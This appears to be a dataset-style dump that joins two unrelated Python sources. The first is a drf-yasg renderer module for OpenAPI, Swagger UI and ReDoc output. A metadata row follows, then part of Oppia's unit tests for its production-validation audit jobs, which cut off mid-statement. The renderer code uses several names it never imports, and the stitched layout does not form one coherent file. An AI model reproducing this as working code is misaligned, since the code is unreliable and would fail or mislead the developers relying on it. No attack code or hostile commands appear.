from rest_framework.renderers import BaseRenderer, JSONRenderer, TemplateHTMLRenderer
from rest_framework.utils import json
from .app_settings import redoc_settings, swagger_settings
from .codecs import VALIDATORS, OpenAPICodecJson, OpenAPICodecYaml
from .openapi import Swagger
from .utils import filter_none
class _SpecRenderer(BaseRenderer):
    """Base class for text renderers. Handles encoding and validation."""
    charset = 'utf-8'
    validators = []
    codec_class = None

    @classmethod
    def with_validators(cls, validators):
        """Return a dynamically-created subclass whose ``validators`` is set to the given list."""
        assert all(vld in VALIDATORS for vld in validators), "allowed validators are " + ", ".join(VALIDATORS)
        return type(cls.__name__, (cls,), {'validators': validators})

    def render(self, data, media_type=None, renderer_context=None):
        """Encode ``data`` via ``codec_class``; fall back to plain JSON for non-Swagger payloads."""
        assert self.codec_class, "must override codec_class"
        codec = self.codec_class(self.validators)
        if not isinstance(data, Swagger):
            # see https://github.com/axnsan12/drf-yasg/issues/58
            return JSONRenderer().render(data, media_type, renderer_context)
        return codec.encode(data)
class OpenAPIRenderer(_SpecRenderer):
    """Renders the schema as JSON with the ``application/openapi+json`` mime type."""
    media_type = 'application/openapi+json'
    format = 'openapi'
    codec_class = OpenAPICodecJson
class SwaggerJSONRenderer(_SpecRenderer):
    """Renders the schema as JSON with the generic ``application/json`` mime type."""
    media_type = 'application/json'
    format = '.json'
    codec_class = OpenAPICodecJson
class SwaggerYAMLRenderer(_SpecRenderer):
    """Renders the schema as a YAML document."""
    media_type = 'application/yaml'
    format = '.yaml'
    codec_class = OpenAPICodecYaml
class _UIRenderer(BaseRenderer):
    """Base class for web UI renderers. Loads and passes settings to the HTML template."""
    media_type = 'text/html'
    charset = 'utf-8'
    template = ''

    def render(self, swagger, accepted_media_type=None, renderer_context=None):
        """Render the spec into the HTML ``template``; fall back for non-Swagger payloads."""
        if not isinstance(swagger, Swagger):  # pragma: no cover
            # if `swagger` is not a ``Swagger`` object, it means we somehow got a non-success ``Response``
            # in that case, it's probably better to let the default ``TemplateHTMLRenderer`` render it
            return TemplateHTMLRenderer().render(swagger, accepted_media_type, renderer_context)
        self.set_context(renderer_context, swagger)
        return render(renderer_context['request'], self.template, renderer_context)

    def set_context(self, renderer_context, swagger=None):
        """Populate the template context with spec metadata, OAuth2 config and auth URLs."""
        renderer_context['title'] = swagger.info.title or '' if swagger else ''
        renderer_context['version'] = swagger.info.version or '' if swagger else ''
        renderer_context['oauth2_config'] = json.dumps(self.get_oauth2_config())
        renderer_context['USE_SESSION_AUTH'] = swagger_settings.USE_SESSION_AUTH
        renderer_context.update(self.get_auth_urls())

    def resolve_url(self, to):
        """Resolve a URL setting which may be None, a (lazy) string/view name,
        or a (name, kwargs) / (name, args, kwargs) tuple."""
        if isinstance(to, Promise):
            # force lazy strings (e.g. reverse_lazy results) before dispatching on type
            to = str(to)

        if to is None:
            return None

        args, kwargs = None, None
        if not isinstance(to, six.string_types):
            if len(to) > 2:
                to, args, kwargs = to
            elif len(to) == 2:
                to, kwargs = to
        args = args or ()
        kwargs = kwargs or {}
        return resolve_url(to, *args, **kwargs)

    def get_auth_urls(self):
        """Return LOGIN_URL/LOGOUT_URL context entries, omitting unset (None) ones."""
        urls = {
            'LOGIN_URL': self.resolve_url(swagger_settings.LOGIN_URL),
            'LOGOUT_URL': self.resolve_url(swagger_settings.LOGOUT_URL),
        }
        return filter_none(urls)

    def get_oauth2_config(self):
        """Return the OAUTH2_CONFIG setting after checking it is a dict."""
        data = swagger_settings.OAUTH2_CONFIG
        assert isinstance(data, dict), "OAUTH2_CONFIG must be a dict"
        return data
class SwaggerUIRenderer(_UIRenderer):
    """Renders a swagger-ui web interface for schema browsing."""
    template = 'drf-yasg/swagger-ui.html'
    format = 'swagger'

    def set_context(self, renderer_context, swagger=None):
        """Add the serialized swagger-ui settings on top of the base UI context."""
        super(SwaggerUIRenderer, self).set_context(renderer_context, swagger)
        renderer_context['swagger_settings'] = json.dumps(self.get_swagger_ui_settings())

    def get_swagger_ui_settings(self):
        """Map SWAGGER_SETTINGS values onto swagger-ui configuration keys, dropping unset ones."""
        data = {
            'url': self.resolve_url(swagger_settings.SPEC_URL),
            'operationsSorter': swagger_settings.OPERATIONS_SORTER,
            'tagsSorter': swagger_settings.TAGS_SORTER,
            'docExpansion': swagger_settings.DOC_EXPANSION,
            'deepLinking': swagger_settings.DEEP_LINKING,
            'showExtensions': swagger_settings.SHOW_EXTENSIONS,
            'defaultModelRendering': swagger_settings.DEFAULT_MODEL_RENDERING,
            'defaultModelExpandDepth': swagger_settings.DEFAULT_MODEL_DEPTH,
            'defaultModelsExpandDepth': swagger_settings.DEFAULT_MODEL_DEPTH,
            'showCommonExtensions': swagger_settings.SHOW_COMMON_EXTENSIONS,
            'oauth2RedirectUrl': swagger_settings.OAUTH2_REDIRECT_URL,
            'supportedSubmitMethods': swagger_settings.SUPPORTED_SUBMIT_METHODS,
            'displayOperationId': swagger_settings.DISPLAY_OPERATION_ID,
            'persistAuth': swagger_settings.PERSIST_AUTH,
            'refetchWithAuth': swagger_settings.REFETCH_SCHEMA_WITH_AUTH,
            'refetchOnLogout': swagger_settings.REFETCH_SCHEMA_ON_LOGOUT,
            'fetchSchemaWithQuery': swagger_settings.FETCH_SCHEMA_WITH_QUERY,
        }
        data = filter_none(data)
        # NOTE(review): an empty-string VALIDATOR_URL suppresses the key
        # entirely, while None is forwarded as-is after the filter — confirm
        # this matches the intended swagger-ui "disable validator" semantics.
        if swagger_settings.VALIDATOR_URL != '':
            data['validatorUrl'] = self.resolve_url(swagger_settings.VALIDATOR_URL)
        return data
class ReDocRenderer(_UIRenderer):
    """Renders a ReDoc web interface for schema browsing."""
    template = 'drf-yasg/redoc.html'
    format = 'redoc'

    def set_context(self, renderer_context, swagger=None):
        """Add the serialized ReDoc settings on top of the base UI context."""
        super(ReDocRenderer, self).set_context(renderer_context, swagger)
        renderer_context['redoc_settings'] = json.dumps(self.get_redoc_settings())

    def get_redoc_settings(self):
        """Map REDOC_SETTINGS values onto ReDoc configuration keys, dropping unset ones."""
        data = {
            'url': self.resolve_url(redoc_settings.SPEC_URL),
            'lazyRendering': redoc_settings.LAZY_RENDERING,
            'hideHostname': redoc_settings.HIDE_HOSTNAME,
            'expandResponses': redoc_settings.EXPAND_RESPONSES,
            'pathInMiddlePanel': redoc_settings.PATH_IN_MIDDLE,
            'nativeScrollbars': redoc_settings.NATIVE_SCROLLBARS,
            'requiredPropsFirst': redoc_settings.REQUIRED_PROPS_FIRST,
            'fetchSchemaWithQuery': redoc_settings.FETCH_SCHEMA_WITH_QUERY,
        }
        return filter_none(data)
class ReDocOldRenderer(ReDocRenderer):
    """Renders a ReDoc 1.x.x web interface for schema browsing."""
    template = 'drf-yasg/redoc-old.html'
| true
| true
|
790c61d66ec9360ba20d79b6857506daf66299c9
| 287,940
|
py
|
Python
|
core/domain/prod_validation_jobs_one_off_test.py
|
cclauss/oppia
|
7ad9d06e434c589f0aaa015252ca65872557b7eb
|
[
"Apache-2.0"
] | null | null | null |
core/domain/prod_validation_jobs_one_off_test.py
|
cclauss/oppia
|
7ad9d06e434c589f0aaa015252ca65872557b7eb
|
[
"Apache-2.0"
] | null | null | null |
core/domain/prod_validation_jobs_one_off_test.py
|
cclauss/oppia
|
7ad9d06e434c589f0aaa015252ca65872557b7eb
|
[
"Apache-2.0"
] | null | null | null |
# coding: utf-8
#
# Copyright 2019 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Unit tests for core.domain.prod_validation_jobs_one_off."""
import ast
import datetime
import math
import random
import time
import types
from constants import constants
from core import jobs_registry
from core.domain import collection_domain
from core.domain import collection_services
from core.domain import exp_domain
from core.domain import exp_services
from core.domain import feedback_services
from core.domain import prod_validation_jobs_one_off
from core.domain import rating_services
from core.domain import recommendations_services
from core.domain import rights_manager
from core.domain import story_domain
from core.domain import story_services
from core.domain import subscription_services
from core.domain import topic_domain
from core.domain import topic_services
from core.domain import user_services
from core.platform import models
from core.platform.taskqueue import gae_taskqueue_services as taskqueue_services
from core.tests import test_utils
import feconf
from google.appengine.api import datastore_types
from google.appengine.ext import db
gae_search_services = models.Registry.import_search_services()

# Shared fixture values used across the validator test cases below.
USER_EMAIL = 'useremail@example.com'
USER_NAME = 'username'
CURRENT_DATETIME = datetime.datetime.utcnow()

(
    activity_models, audit_models, base_models,
    collection_models, config_models, email_models,
    exp_models, feedback_models, file_models,
    recommendations_models, story_models,
    user_models,) = (
        models.Registry.import_models([
            models.NAMES.activity, models.NAMES.audit, models.NAMES.base_model,
            models.NAMES.collection, models.NAMES.config, models.NAMES.email,
            models.NAMES.exploration, models.NAMES.feedback, models.NAMES.file,
            models.NAMES.recommendations, models.NAMES.story,
            models.NAMES.user]))

# Alias kept so isinstance checks still succeed after datetime.datetime is
# swapped out for MockDatetime13Hours in individual tests.
OriginalDatetimeType = datetime.datetime
class PatchedDatetimeType(type):
    """Validates the datetime instances."""

    def __instancecheck__(cls, other):
        """Validates whether the given instance is a datatime
        instance.
        """
        # Check against the saved original type so real datetimes still pass
        # isinstance checks while datetime.datetime is swapped with a mock.
        return isinstance(other, OriginalDatetimeType)
class MockDatetime13Hours(datetime.datetime):
    # datetime subclass whose utcnow() reports a time 13 hours behind the
    # module-level CURRENT_DATETIME, used to simulate clock skew in tests.
    __metaclass__ = PatchedDatetimeType

    @classmethod
    def utcnow(cls):
        """Returns the current date and time 13 hours behind UTC."""
        return CURRENT_DATETIME - datetime.timedelta(hours=13)
def _literal_eval_output_dict(output):
    """Parses each stringified job output item with ast.literal_eval and
    returns a dict {key: value}, with list values sorted so comparisons are
    order-insensitive.
    """
    output_dict = {}
    for item in [ast.literal_eval(value) for value in output]:
        value = item[1]
        if isinstance(value, list):
            value = sorted(value)
        output_dict[item[0]] = value
    return output_dict


def run_job_and_check_output(
        self, expected_output, sort=False, literal_eval=False):
    """Helper function to run job and compare output.

    Args:
        self: the test case instance (this helper is shared across classes).
        expected_output: list(str). The expected stringified job output.
        sort: bool. Whether to compare outputs as sorted lists.
        literal_eval: bool. Whether to parse each output item and compare
            keys/values order-insensitively.
    """
    job_id = self.job_class.create_new()
    self.assertEqual(
        self.count_jobs_in_taskqueue(
            taskqueue_services.QUEUE_NAME_ONE_OFF_JOBS), 0)
    self.job_class.enqueue(job_id)
    self.assertEqual(
        self.count_jobs_in_taskqueue(
            taskqueue_services.QUEUE_NAME_ONE_OFF_JOBS), 1)
    self.process_and_flush_pending_tasks()
    actual_output = self.job_class.get_output(job_id)
    if literal_eval:
        # Refactor: the parse-and-sort loop was previously duplicated inline
        # for both actual and expected output; it now lives in one helper.
        actual_output_dict = _literal_eval_output_dict(actual_output)
        expected_output_dict = _literal_eval_output_dict(expected_output)
        self.assertEqual(
            sorted(actual_output_dict.keys()),
            sorted(expected_output_dict.keys()))
        for key in actual_output_dict:
            self.assertEqual(actual_output_dict[key], expected_output_dict[key])
    elif sort:
        self.assertEqual(sorted(actual_output), sorted(expected_output))
    else:
        self.assertEqual(actual_output, expected_output)
def update_datastore_types_for_mock_datetime():
    """Updates datastore types for MockDatetime13Hours to ensure that validation
    of ndb datetime properties does not fail.
    """
    # Register the mock class in GAE's (private) datastore type maps so that
    # properties holding MockDatetime13Hours values serialize exactly like
    # real datetimes.
    # pylint: disable=protected-access
    datastore_types._VALIDATE_PROPERTY_VALUES[MockDatetime13Hours] = (
        datastore_types.ValidatePropertyNothing)
    datastore_types._PACK_PROPERTY_VALUES[MockDatetime13Hours] = (
        datastore_types.PackDatetime)
    datastore_types._PROPERTY_MEANINGS[MockDatetime13Hours] = (
        datastore_types.entity_pb.Property.GD_WHEN)
    # pylint: enable=protected-access
class MockModel(base_models.BaseModel):
    """Minimal BaseModel subclass used as a validation target in tests."""
    pass
class MockSnapshotModel(base_models.BaseModel):
    # Minimal snapshot model exposing the commit fields snapshot validators read.
    commit_type = 'edit'
    commit_cmds = []
class MockBaseModelValidator(prod_validation_jobs_one_off.BaseModelValidator):
    """Bare validator subclass that overrides no hooks, used to test that the
    base class raises NotImplementedError."""
    pass
class MockSummaryModelValidator(
        prod_validation_jobs_one_off.BaseSummaryModelValidator):
    """Summary validator with no external id relationships; other required
    hooks remain unimplemented on purpose."""

    @classmethod
    def _get_external_id_relationships(cls, item):
        return {}
class MockSnapshotContentModelValidator(
        prod_validation_jobs_one_off.BaseSnapshotContentModelValidator):
    """Snapshot-content validator that deliberately leaves
    EXTERNAL_MODEL_NAME unset to exercise the base-class check."""

    @classmethod
    def _get_external_id_relationships(cls, item):
        return {}
class MockSnapshotMetadataModelValidator(
        prod_validation_jobs_one_off.BaseSnapshotMetadataModelValidator):
    """Snapshot-metadata validator with a model name but no change-domain
    class, used to test the NotImplementedError path."""

    EXTERNAL_MODEL_NAME = 'external model'

    @classmethod
    def _get_external_id_relationships(cls, item):
        return {
            'external_model_ids': (MockModel, [])
        }
class NotImplementedErrorTests(test_utils.GenericTestBase):
    """Checks that the abstract validator base classes raise
    NotImplementedError (or an explicit Exception) when required hooks are
    not overridden by a subclass."""

    def setUp(self):
        super(NotImplementedErrorTests, self).setUp()
        self.item = MockModel(id='mockmodel')
        self.item.put()

    def test_error_is_raised_if_fetch_external_properties_is_undefined(self):
        with self.assertRaises(NotImplementedError):
            MockBaseModelValidator().validate(self.item)

    def test_error_is_get_external_model_properties_is_undefined(self):
        with self.assertRaises(NotImplementedError):
            MockSummaryModelValidator().validate(self.item)

    def test_error_is_raised_if_external_model_name_is_undefined(self):
        with self.assertRaisesRegexp(
                Exception, 'External model name should be specified'):
            MockSnapshotContentModelValidator().validate(self.item)

    def test_error_is_raised_if_get_change_domain_class_is_undefined(self):
        with self.assertRaises(NotImplementedError):
            snapshot_model = MockSnapshotModel(id='mockmodel')
            snapshot_model.put()
            MockSnapshotMetadataModelValidator().validate(snapshot_model)

    def test_error_is_raised_if_entity_classes_to_map_over_is_undefined(self):
        job_class = prod_validation_jobs_one_off.ProdValidationAuditOneOffJob
        # Swap the registered one-off jobs so the abstract audit job itself
        # gets enqueued and run.
        with self.assertRaises(NotImplementedError), self.swap(
                jobs_registry, 'ONE_OFF_JOB_MANAGERS', [job_class]):
            job_id = job_class.create_new()
            job_class.enqueue(job_id)
            self.process_and_flush_pending_tasks()
class ActivityReferencesModelValidatorTests(test_utils.GenericTestBase):
    """Audit-job tests for ActivityReferencesModel validation: a valid model,
    time-field anomalies, malformed activity_references entries, and an
    invalid entity id."""

    def setUp(self):
        super(ActivityReferencesModelValidatorTests, self).setUp()
        self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
        self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
        self.owner = user_services.UserActionsInfo(self.owner_id)
        # One exploration and one collection for the references to point at.
        exploration = exp_domain.Exploration.create_default_exploration(
            '1exp', title='title', category='category')
        exp_services.save_new_exploration(self.owner_id, exploration)
        collection = collection_domain.Collection.create_default_collection(
            '1col', title='title', category='category')
        collection_services.save_new_collection(self.owner_id, collection)
        self.model_instance = (
            activity_models.ActivityReferencesModel.get_or_create('featured'))
        self.model_instance.activity_references = [{
            'type': constants.ACTIVITY_TYPE_EXPLORATION,
            'id': '1exp',
        }, {
            'type': constants.ACTIVITY_TYPE_COLLECTION,
            'id': '1col',
        }]
        self.model_instance.put()
        self.job_class = (
            prod_validation_jobs_one_off.ActivityReferencesModelAuditOneOffJob)

    def test_standard_model(self):
        expected_output = [u'[u\'fully-validated ActivityReferencesModel\', 1]']
        run_job_and_check_output(self, expected_output)

    def test_model_with_created_on_greater_than_last_updated(self):
        self.model_instance.created_on = (
            self.model_instance.last_updated + datetime.timedelta(days=1))
        self.model_instance.put()
        expected_output = [(
            u'[u\'failed validation check for time field relation check '
            'of ActivityReferencesModel\', '
            '[u\'Entity id featured: The created_on field has a value '
            '%s which is greater than the value '
            '%s of last_updated field\']]') % (
                self.model_instance.created_on, self.model_instance.last_updated
            )]
        run_job_and_check_output(self, expected_output)

    def test_model_with_last_updated_greater_than_current_time(self):
        expected_output = [(
            u'[u\'failed validation check for current time check of '
            'ActivityReferencesModel\', '
            '[u\'Entity id %s: The last_updated field has a '
            'value %s which is greater than the time when the job was run\']]'
        ) % (self.model_instance.id, self.model_instance.last_updated)]
        # Run the job with the clock mocked 13 hours behind so last_updated
        # appears to be in the future.
        with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
                db.DateTimeProperty, 'data_type', MockDatetime13Hours):
            update_datastore_types_for_mock_datetime()
            run_job_and_check_output(self, expected_output)

    def test_model_with_missing_id_in_activity_references(self):
        self.model_instance.activity_references = [{
            'type': 'exploration',
        }]
        self.model_instance.put()
        expected_output = [(
            u'[u\'failed validation check for fetch properties of '
            'ActivityReferencesModel\', '
            '[u"Entity id featured: Entity properties cannot be fetched '
            'completely with the error \'id\'"]]')]
        run_job_and_check_output(self, expected_output, sort=True)

    def test_model_with_invalid_type_in_activity_references(self):
        self.model_instance.activity_references = [{
            'type': 'invalid_type',
            'id': '0'
        }]
        self.model_instance.put()
        expected_output = [(
            u'[u\'failed validation check for domain object check of '
            'ActivityReferencesModel\', '
            '[u\'Entity id featured: Entity fails domain validation with the '
            'error Invalid activity type: invalid_type\']]')]
        run_job_and_check_output(self, expected_output)

    def test_model_with_invalid_id_in_activity_references(self):
        self.model_instance.activity_references = [{
            'type': 'exploration',
            'id': '1col'
        }]
        self.model_instance.put()
        expected_output = [(
            u'[u\'failed validation check for exploration_ids field check of '
            'ActivityReferencesModel\', '
            '[u"Entity id featured: based on field exploration_ids having '
            'value 1col, expect model ExplorationModel with id 1col but '
            'it doesn\'t exist"]]')]
        run_job_and_check_output(self, expected_output)

    def test_mock_model_with_invalid_id(self):
        model_instance_with_invalid_id = (
            activity_models.ActivityReferencesModel(id='invalid'))
        model_instance_with_invalid_id.put()
        expected_output = [(
            u'[u\'fully-validated ActivityReferencesModel\', 1]'
        ), (
            u'[u\'failed validation check for model id check of '
            'ActivityReferencesModel\', '
            '[u\'Entity id invalid: Entity id does not match regex pattern\']]'
        )]
        run_job_and_check_output(self, expected_output, sort=True)
class RoleQueryAuditModelValidatorTests(test_utils.GenericTestBase):
    """Tests for the one-off audit job that validates RoleQueryAuditModel."""

    def setUp(self):
        super(RoleQueryAuditModelValidatorTests, self).setUp()
        self.signup(self.ADMIN_EMAIL, self.ADMIN_USERNAME)
        self.signup(USER_EMAIL, USER_NAME)
        self.admin_id = self.get_user_id_from_email(self.ADMIN_EMAIL)
        admin_model = user_models.UserSettingsModel.get_by_id(self.admin_id)
        admin_model.role = feconf.ROLE_ID_ADMIN
        admin_model.put()
        # Valid ids follow the pattern:
        # <user_id>.<timestamp>.<intent>.<random int>.
        model_id = '%s.%s.%s.%s' % (
            self.admin_id, int(math.floor(time.time())),
            feconf.ROLE_ACTION_UPDATE, random.randint(0, 1000))
        self.model_instance = audit_models.RoleQueryAuditModel(
            id=model_id, user_id=self.admin_id,
            intent=feconf.ROLE_ACTION_UPDATE, role='c', username='d')
        self.model_instance.put()
        self.job_class = (
            prod_validation_jobs_one_off.RoleQueryAuditModelAuditOneOffJob)

    def test_standard_model(self):
        expected_output = [u'[u\'fully-validated RoleQueryAuditModel\', 1]']
        run_job_and_check_output(self, expected_output)

    def test_model_with_created_on_greater_than_last_updated(self):
        # created_on after last_updated violates the time-field relation check.
        self.model_instance.created_on = (
            self.model_instance.last_updated + datetime.timedelta(days=1))
        self.model_instance.put()
        expected_output = [(
            u'[u\'failed validation check for time field relation check '
            'of RoleQueryAuditModel\', '
            '[u\'Entity id %s: The created_on field has a value '
            '%s which is greater than the value '
            '%s of last_updated field\']]') % (
                self.model_instance.id, self.model_instance.created_on,
                self.model_instance.last_updated
            )]
        run_job_and_check_output(self, expected_output)

    def test_model_with_last_updated_greater_than_current_time(self):
        expected_output = [(
            u'[u\'failed validation check for current time check of '
            'RoleQueryAuditModel\', '
            '[u\'Entity id %s: The last_updated field has a '
            'value %s which is greater than the time when the job was run\']]'
        ) % (self.model_instance.id, self.model_instance.last_updated)]
        # Freeze "now" at a mocked earlier datetime so the stored
        # last_updated value appears to be in the future.
        with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
            db.DateTimeProperty, 'data_type', MockDatetime13Hours):
            update_datastore_types_for_mock_datetime()
            run_job_and_check_output(self, expected_output)

    def test_model_with_non_existent_user_id(self):
        # Deleting the referenced user should trigger the external user_ids
        # field check.
        user_models.UserSettingsModel.get(self.admin_id).delete()
        expected_output = [(
            u'[u\'failed validation check for user_ids field check of '
            'RoleQueryAuditModel\', '
            '[u"Entity id %s: based on field user_ids having value '
            '%s, expect model UserSettingsModel with '
            'id %s but it doesn\'t exist"]]') % (
                self.model_instance.id, self.admin_id, self.admin_id)]
        run_job_and_check_output(self, expected_output)

    def test_model_with_invalid_id(self):
        # 'a' is not a valid user id, so the composite id fails the regex.
        model_invalid_id = '%s.%s.%s.%s' % (
            'a', int(math.floor(time.time())), feconf.ROLE_ACTION_UPDATE,
            random.randint(0, 1000))
        model_instance_with_invalid_id = audit_models.RoleQueryAuditModel(
            id=model_invalid_id, user_id=self.admin_id,
            intent=feconf.ROLE_ACTION_UPDATE, role='c', username='d')
        model_instance_with_invalid_id.put()
        expected_output = [(
            u'[u\'fully-validated RoleQueryAuditModel\', 1]'
        ), (
            u'[u\'failed validation check for model id check of '
            'RoleQueryAuditModel\', '
            '[u\'Entity id %s: Entity id does not match regex pattern\']]'
        ) % model_invalid_id]
        run_job_and_check_output(self, expected_output, sort=True)
class CollectionModelValidatorTests(test_utils.GenericTestBase):
    """Tests for the one-off audit job that validates CollectionModel."""

    def setUp(self):
        super(CollectionModelValidatorTests, self).setUp()
        self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
        self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
        # Six explorations so each of the three collections below can
        # reference two of them as nodes.
        explorations = [exp_domain.Exploration.create_default_exploration(
            '%s' % i,
            title='title %d' % i,
            category='category%d' % i,
        ) for i in xrange(6)]
        for exp in explorations:
            exp_services.save_new_exploration(self.owner_id, exp)
        # Collection '0' gets a non-'en' code so the schema test below can
        # make it invalid by restricting ALL_LANGUAGE_CODES to English.
        language_codes = ['ar', 'en', 'en']
        collections = [collection_domain.Collection.create_default_collection(
            '%s' % i,
            title='title %d' % i,
            category='category%d' % i,
            objective='objective%d' % i,
            language_code=language_codes[i]
        ) for i in xrange(3)]
        for index, collection in enumerate(collections):
            collection.add_node('%s' % (index * 2))
            collection.add_node('%s' % (index * 2 + 1))
            collection_services.save_new_collection(self.owner_id, collection)
        self.model_instance_0 = collection_models.CollectionModel.get_by_id('0')
        self.model_instance_1 = collection_models.CollectionModel.get_by_id('1')
        self.model_instance_2 = collection_models.CollectionModel.get_by_id('2')
        self.job_class = (
            prod_validation_jobs_one_off.CollectionModelAuditOneOffJob)

    def test_standard_operation(self):
        collection_services.update_collection(
            self.owner_id, '0', [{
                'cmd': 'edit_collection_property',
                'property_name': 'title',
                'new_value': 'New title'
            }], 'Changes.')
        expected_output = [
            u'[u\'fully-validated CollectionModel\', 3]']
        run_job_and_check_output(self, expected_output)

    def test_model_with_created_on_greater_than_last_updated(self):
        # created_on after last_updated violates the time-field relation check.
        self.model_instance_0.created_on = (
            self.model_instance_0.last_updated + datetime.timedelta(days=1))
        self.model_instance_0.commit(
            feconf.SYSTEM_COMMITTER_ID, 'created_on test', [])
        expected_output = [
            (
                u'[u\'failed validation check for time field relation check '
                'of CollectionModel\', '
                '[u\'Entity id %s: The created_on field has a value '
                '%s which is greater than the value '
                '%s of last_updated field\']]') % (
                    self.model_instance_0.id,
                    self.model_instance_0.created_on,
                    self.model_instance_0.last_updated
                ),
            u'[u\'fully-validated CollectionModel\', 2]']
        run_job_and_check_output(self, expected_output, sort=True)

    def test_model_with_last_updated_greater_than_current_time(self):
        self.model_instance_1.delete(feconf.SYSTEM_COMMITTER_ID, 'delete')
        self.model_instance_2.delete(feconf.SYSTEM_COMMITTER_ID, 'delete')
        expected_output = [(
            u'[u\'failed validation check for current time check of '
            'CollectionModel\', '
            '[u\'Entity id %s: The last_updated field has a '
            'value %s which is greater than the time when the job was run\']]'
        ) % (self.model_instance_0.id, self.model_instance_0.last_updated)]
        # Freeze "now" at a mocked earlier datetime so the stored
        # last_updated value appears to be in the future.
        with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
            db.DateTimeProperty, 'data_type', MockDatetime13Hours):
            update_datastore_types_for_mock_datetime()
            run_job_and_check_output(self, expected_output, sort=True)

    def test_model_with_invalid_collection_schema(self):
        # Collection '0' uses language code 'ar' (see setUp); restricting
        # the allowed codes to 'en' makes its domain validation fail.
        expected_output = [
            (
                u'[u\'failed validation check for domain object check of '
                'CollectionModel\', '
                '[u\'Entity id %s: Entity fails domain validation with the '
                'error Invalid language code: %s\']]'
            ) % (self.model_instance_0.id, self.model_instance_0.language_code),
            u'[u\'fully-validated CollectionModel\', 2]']
        with self.swap(
            constants, 'ALL_LANGUAGE_CODES', [{
                'code': 'en', 'description': 'English'}]):
            run_job_and_check_output(self, expected_output, sort=True)

    def test_missing_exploration_model_failure(self):
        exp_models.ExplorationModel.get_by_id('1').delete(
            self.owner_id, '', [])
        expected_output = [
            (
                u'[u\'failed validation check for '
                'exploration_ids field check of CollectionModel\', '
                '[u"Entity id 0: based on field exploration_ids having value '
                '1, expect model ExplorationModel '
                'with id 1 but it doesn\'t exist"]]'
            ),
            u'[u\'fully-validated CollectionModel\', 2]']
        run_job_and_check_output(self, expected_output, sort=True)

    def test_missing_collection_commit_log_entry_model_failure(self):
        # Updating the collection creates commit-log entry 'collection-0-1';
        # deleting that entry breaks the external reference.
        collection_services.update_collection(
            self.owner_id, '0', [{
                'cmd': 'edit_collection_property',
                'property_name': 'title',
                'new_value': 'New title'
            }], 'Changes.')
        collection_models.CollectionCommitLogEntryModel.get_by_id(
            'collection-0-1').delete()
        expected_output = [
            (
                u'[u\'failed validation check for '
                'collection_commit_log_entry_ids field check of '
                'CollectionModel\', '
                '[u"Entity id 0: based on field '
                'collection_commit_log_entry_ids having value '
                'collection-0-1, expect model CollectionCommitLogEntryModel '
                'with id collection-0-1 but it doesn\'t exist"]]'),
            u'[u\'fully-validated CollectionModel\', 2]']
        run_job_and_check_output(self, expected_output, sort=True)

    def test_missing_summary_model_failure(self):
        collection_models.CollectionSummaryModel.get_by_id('0').delete()
        expected_output = [
            (
                u'[u\'failed validation check for collection_summary_ids '
                'field check of CollectionModel\', '
                '[u"Entity id 0: based on field collection_summary_ids '
                'having value 0, expect model CollectionSummaryModel with '
                'id 0 but it doesn\'t exist"]]'),
            u'[u\'fully-validated CollectionModel\', 2]']
        run_job_and_check_output(self, expected_output, sort=True)

    def test_missing_collection_rights_model_failure(self):
        collection_models.CollectionRightsModel.get_by_id(
            '0').delete(feconf.SYSTEM_COMMITTER_ID, '', [])
        expected_output = [
            (
                u'[u\'failed validation check for collection_rights_ids '
                'field check of CollectionModel\', '
                '[u"Entity id 0: based on field collection_rights_ids having '
                'value 0, expect model CollectionRightsModel with id 0 but '
                'it doesn\'t exist"]]'),
            u'[u\'fully-validated CollectionModel\', 2]']
        run_job_and_check_output(self, expected_output, sort=True)

    def test_missing_snapshot_metadata_model_failure(self):
        collection_models.CollectionSnapshotMetadataModel.get_by_id(
            '0-1').delete()
        expected_output = [
            (
                u'[u\'failed validation check for snapshot_metadata_ids '
                'field check of CollectionModel\', '
                '[u"Entity id 0: based on field snapshot_metadata_ids having '
                'value 0-1, expect model CollectionSnapshotMetadataModel '
                'with id 0-1 but it doesn\'t exist"]]'),
            u'[u\'fully-validated CollectionModel\', 2]']
        run_job_and_check_output(self, expected_output, sort=True)

    def test_missing_snapshot_content_model_failure(self):
        collection_models.CollectionSnapshotContentModel.get_by_id(
            '0-1').delete()
        expected_output = [
            (
                u'[u\'failed validation check for snapshot_content_ids '
                'field check of CollectionModel\', '
                '[u"Entity id 0: based on field snapshot_content_ids having '
                'value 0-1, expect model CollectionSnapshotContentModel '
                'with id 0-1 but it doesn\'t exist"]]'),
            u'[u\'fully-validated CollectionModel\', 2]']
        run_job_and_check_output(self, expected_output, sort=True)
class CollectionSnapshotMetadataModelValidatorTests(
        test_utils.GenericTestBase):
    """Tests for the one-off audit job that validates
    CollectionSnapshotMetadataModel.
    """

    def setUp(self):
        super(CollectionSnapshotMetadataModelValidatorTests, self).setUp()
        self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
        self.signup(USER_EMAIL, USER_NAME)
        self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
        self.user_id = self.get_user_id_from_email(USER_EMAIL)
        # Six explorations so each of the three collections below can
        # reference two of them as nodes.
        explorations = [exp_domain.Exploration.create_default_exploration(
            '%s' % i,
            title='title %d' % i,
            category='category%d' % i,
        ) for i in xrange(6)]
        for exp in explorations:
            exp_services.save_new_exploration(self.owner_id, exp)
        collections = [collection_domain.Collection.create_default_collection(
            '%s' % i,
            title='title %d' % i,
            category='category%d' % i,
            objective='objective%d' % i,
        ) for i in xrange(3)]
        for index, collection in enumerate(collections):
            collection.add_node('%s' % (index * 2))
            collection.add_node('%s' % (index * 2 + 1))
            # Collection '0' is committed by a plain user (not the owner) so
            # that committer-deletion tests below can target it.
            if collection.id != '0':
                collection_services.save_new_collection(
                    self.owner_id, collection)
            else:
                collection_services.save_new_collection(
                    self.user_id, collection)
        self.model_instance_0 = (
